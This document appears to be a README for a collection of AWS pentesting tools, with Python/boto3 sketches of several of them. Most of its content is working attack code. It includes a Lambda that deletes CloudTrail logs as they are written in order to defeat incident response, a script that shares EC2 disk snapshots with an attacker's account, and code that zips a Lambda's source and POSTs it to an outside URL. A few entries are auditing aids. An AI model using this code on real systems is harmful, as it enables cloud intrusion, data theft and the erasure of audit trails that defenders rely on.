- **`assume-role-helper.sh`** - Calls `aws sts assume-role` with an MFA token to retrieve session credentials and reformats them into the `~/.aws/credentials` file format. This eases copying and pasting credentials returned by the Assume Role facility into the credentials file, so that tools unable to process MFA tokens, such as _s3tk_, can be used with a preconfigured profile.
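The helper itself is a shell script wrapping the AWS CLI; below is a minimal sketch of the same idea in Python/boto3, not the helper's actual code. The role ARN, MFA device ARN, token code and profile name are hypothetical placeholders:
```
import boto3

def assume_role_to_profile(role_arn, mfa_serial, token_code, profile="assumed-role"):
    """Assume a role with an MFA token and return the session credentials
    formatted as a ~/.aws/credentials profile block."""
    sts = boto3.client("sts")
    creds = sts.assume_role(
        RoleArn=role_arn,
        RoleSessionName="assume-role-helper",
        SerialNumber=mfa_serial,   # ARN of the MFA device
        TokenCode=token_code,      # current 6-digit MFA token
    )["Credentials"]
    # Paste this block into ~/.aws/credentials and point MFA-unaware tools
    # (such as s3tk) at it with --profile.
    return (f"[{profile}]\n"
            f"aws_access_key_id = {creds['AccessKeyId']}\n"
            f"aws_secret_access_key = {creds['SecretAccessKey']}\n"
            f"aws_session_token = {creds['SessionToken']}\n")

if __name__ == "__main__":
    print(assume_role_to_profile(
        "arn:aws:iam::123456789012:role/target-role",   # hypothetical role
        "arn:aws:iam::123456789012:mfa/some-user",      # hypothetical MFA device
        "123456"))                                      # current MFA token
```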
- **`disruptCloudTrailByS3Lambda.py`** - This script attempts to disrupt CloudTrail by planting a Lambda function that will delete every object created in the S3 bucket bound to a trail (see the sketch after the example output below). As soon as CloudTrail creates a new object in the S3 bucket, the Lambda will kick in and delete that object. No object, no logs. No logs, no Incident Response :-)
- IAM role will be created, by default with name: `cloudtrail_helper_role`
- IAM policy will be created, by default with name: `cloudtrail_helper_policy`
- Lambda function will be created, by default with name: `cloudtrail_helper_function`
- Put Event notification will be configured on affected CloudTrail S3 buckets.
This tool will fail upon first execution with the following exception:
```
[-] Could not create a Lambda function: An error occurred (InvalidParameterValueException) when calling the CreateFunction operation: The role defined for the function cannot be assumed by Lambda.
```
At the moment I have not found a definitive explanation for that, though it is most likely caused by IAM's eventual consistency: a freshly created role needs a moment to propagate before Lambda can assume it. Running the tool again with the same set of parameters gets the job done.

Example run:
```
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt
[+] Trail cloudgoat_trail is actively logging (multi region? No).
[.] Trails intended to be disrupted:
- cloudgoat_trail
[.] Step 2: Create a role to be assumed by planted Lambda
[-] Role with name: cloudtrail_helper_role already exists.
[.] Step 3: Create a policy for that role
[-] Policy with name: cloudtrail_helper_policy already exists.
[.] Step 4: Attach policy to the role
[.] Attaching policy (arn:aws:iam::712800000000:policy/cloudtrail_helper_policy) to the role cloudtrail_helper_role
[-] Policy is already attached.
[.] Step 5: Create Lambda function
[.] Using non-disruptive lambda.
[.] Creating a lambda function named: cloudtrail_helper_function on Role: arn:aws:iam::712800000000:role/cloudtrail_helper_role
[+] Function created.
[.] Step 6: Permit function to be invoked on all trails
[.] Adding invoke permission to func: cloudtrail_helper_function on S3 bucket: arn:aws:s3:::90112981864022885796153088027941100000000000000000000000
[.] Step 7: Configure trail bucket's put notification
[.] Putting a bucket notification configuration to 90112981864022885796153088027941100000000000000000000000, ARN: arn:aws:lambda:us-west-2:712800000000:function:cloudtrail_helper_function
```
Afterwards, one should see log entries like the following in the CloudWatch traces of the planted Lambda function, provided that no `--disrupt` option was specified:
```
[*] Following S3 object could be removed: (Bucket=90112981864022885796153088027941100000000000000000000000, Key=cloudtrail/AWSLogs/712800000000/CloudTrail/us-west-2/2019/03/20/712800000000_CloudTrail_us-west-2_20190320T1000Z_oxxxxxxxxxxxxc.json.gz)
```
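When `--disrupt` is specified, the planted function actually deletes the objects instead of merely logging them. A minimal sketch of what such a function boils down to, as an illustrative reconstruction rather than the exact Lambda body shipped with the tool:
```
import boto3
from urllib.parse import unquote_plus

s3 = boto3.client("s3")

def lambda_handler(event, context):
    # Invoked by the bucket's Put Event notification for every new object.
    for record in event.get("Records", []):
        bucket = record["s3"]["bucket"]["name"]
        key = unquote_plus(record["s3"]["object"]["key"])  # keys arrive URL-encoded
        # Delete the freshly written CloudTrail log object. No object, no logs.
        s3.delete_object(Bucket=bucket, Key=key)
        print(f"[*] Deleted S3 object: (Bucket={bucket}, Key={key})")
```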
- **`evaluate-iam-role.sh`** - Enumerates the attached IAM Role policies, or a specific policy given its ARN, walks through all of the granted permissions and lists those known to allow privilege escalation or pose other risks. If `all` is specified as the role name, the tool evaluates all of the user-defined IAM Roles, iteratively. Based on [Rhino Security Labs work](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/). [gist](https://gist.github.com/mgeeky/14685d94af7848e64afefe6fd2341a18)
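The script itself is a shell script on top of the AWS CLI; a minimal Python/boto3 sketch of its core loop might look as follows, with `DANGEROUS` being a small illustrative subset of the Rhino Security Labs permission list:
```
import boto3

# Illustrative subset of permissions known to enable privilege escalation.
DANGEROUS = {"iam:CreatePolicyVersion", "iam:AttachUserPolicy",
             "iam:PassRole", "lambda:CreateFunction", "sts:AssumeRole"}

iam = boto3.client("iam")

def flag_risky_permissions(role_name):
    # Pull every policy attached to the role and inspect its default version.
    attached = iam.list_attached_role_policies(RoleName=role_name)
    for pol in attached["AttachedPolicies"]:
        meta = iam.get_policy(PolicyArn=pol["PolicyArn"])["Policy"]
        doc = iam.get_policy_version(
            PolicyArn=pol["PolicyArn"],
            VersionId=meta["DefaultVersionId"])["PolicyVersion"]["Document"]
        stmts = doc.get("Statement", [])
        if isinstance(stmts, dict):   # a single statement may not be a list
            stmts = [stmts]
        for stmt in stmts:
            actions = stmt.get("Action", [])
            if isinstance(actions, str):
                actions = [actions]
            for action in actions:
                if stmt.get("Effect") == "Allow" and action in DANGEROUS:
                    print(f"[!] {role_name}: {pol['PolicyName']} grants {action}")
```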
- **`exfiltrate-ec2.py`** - This script exploits insecure permissions granted to an EC2 IAM Role, allowing one to exfiltrate the target EC2's filesystem data in the form of a shared EBS snapshot or a publicly exposed AMI image.
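A minimal sketch of the EBS-snapshot variant of this technique is shown below; this is not the script's actual code, and the attacker account ID is a placeholder:
```
import boto3

ec2 = boto3.client("ec2")

def share_volume_snapshots(instance_id, attacker_account_id):
    # Find the volumes attached to the target instance.
    vols = ec2.describe_volumes(
        Filters=[{"Name": "attachment.instance-id", "Values": [instance_id]}])
    for vol in vols["Volumes"]:
        snap = ec2.create_snapshot(VolumeId=vol["VolumeId"],
                                   Description="backup")  # innocuous-looking
        ec2.get_waiter("snapshot_completed").wait(SnapshotIds=[snap["SnapshotId"]])
        # Grant createVolumePermission to the attacker-controlled account,
        # which can then mount the snapshot as a volume on its own instance.
        ec2.modify_snapshot_attribute(
            SnapshotId=snap["SnapshotId"],
            Attribute="createVolumePermission",
            OperationType="add",
            UserIds=[attacker_account_id])
        print(f"[+] Shared snapshot {snap['SnapshotId']} with {attacker_account_id}")
```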
- **`exfiltrateLambdaTasksDirectory.py`** - Script that creates an in-memory ZIP file from the entire `$LAMBDA_TASK_ROOT` directory (typically `/var/task`) and sends it out in the form of an HTTP(S) POST request, within an `exfil` parameter. To be used for exfiltrating an AWS Lambda's entire source code.
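In essence, the technique amounts to the following sketch (the receiver URL is a placeholder and the actual script's parameters may differ); only the standard library is used, since extra packages may not be available inside the Lambda runtime:
```
import base64
import io
import os
import zipfile
from urllib.parse import urlencode
from urllib.request import urlopen

def exfiltrate_task_root(url):
    # Zip the Lambda's deployed source in memory - no writable /tmp needed.
    root = os.environ.get("LAMBDA_TASK_ROOT", "/var/task")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                zf.write(path, os.path.relpath(path, root))
    # POST the base64-encoded archive within an `exfil` parameter.
    data = urlencode({"exfil": base64.b64encode(buf.getvalue()).decode()}).encode()
    urlopen(url, data=data)
```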
- **`find-exposed-resources.sh`** - An utterly simple script enumerating some of the resources that could be publicly shared, which would count as a security misconfiguration.
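One example of such a check, sketched here in Python/boto3 while the script itself is a shell script on the AWS CLI, is listing this account's AMIs that are marked public:
```
import boto3

ec2 = boto3.client("ec2")

def find_public_amis():
    # AMIs owned by this account that anyone on the Internet can launch.
    images = ec2.describe_images(
        Owners=["self"],
        Filters=[{"Name": "is-public", "Values": ["true"]}])
    for image in images["Images"]:
        print(f"[!] Publicly shared AMI: {image['ImageId']} ({image.get('Name', '')})")
```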
- **`identifyS3Bucket.rb`** - This script attempts to determine, by several different means, whether a given name resolves to a valid AWS S3 bucket. It may come in handy when revealing S3 buckets hidden behind HTTP proxies.
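The tool itself is written in Ruby and tries several techniques; one of the simplest, sketched below in Python, is probing the virtual-hosted-style S3 endpoint and interpreting the HTTP status code:
```
from urllib import error, request

def bucket_exists(name):
    # 200 -> bucket exists and its listing is public;
    # 403 -> bucket exists but access is denied;
    # 404 (NoSuchBucket) -> no bucket under that name.
    try:
        request.urlopen(f"https://{name}.s3.amazonaws.com/", timeout=10)
        return True
    except error.HTTPError as e:
        return e.code != 404
    except error.URLError:
        return False   # DNS or network failure - treat as not found
```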
- **`pentest-ec2-instance`** - A set of utilities for quickly starting, SSH-ing into and stopping a single temporary EC2 instance, intended to be used for Web out-of-band tests (SSRF, reverse shells, dns/http/other daemons).
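A minimal Python/boto3 sketch of the start/stop cycle such utilities wrap, with the AMI ID and key-pair name being placeholders rather than the utilities' actual defaults:
```
import boto3

ec2 = boto3.client("ec2")

def start_temporary_instance():
    # Launch a single throwaway instance and print its public IP for ssh.
    resp = ec2.run_instances(
        ImageId="ami-0abcdef1234567890",   # hypothetical AMI
        InstanceType="t2.micro",
        KeyName="pentest-key",             # hypothetical key pair
        MinCount=1, MaxCount=1)
    instance_id = resp["Instances"][0]["InstanceId"]
    ec2.get_waiter("instance_running").wait(InstanceIds=[instance_id])
    desc = ec2.describe_instances(InstanceIds=[instance_id])
    ip = desc["Reservations"][0]["Instances"][0].get("PublicIpAddress")
    print(f"[+] ssh ec2-user@{ip}   # instance {instance_id}")
    return instance_id

def stop_temporary_instance(instance_id):
    # Terminate (rather than stop) so nothing lingers after the test.
    ec2.terminate_instances(InstanceIds=[instance_id])
```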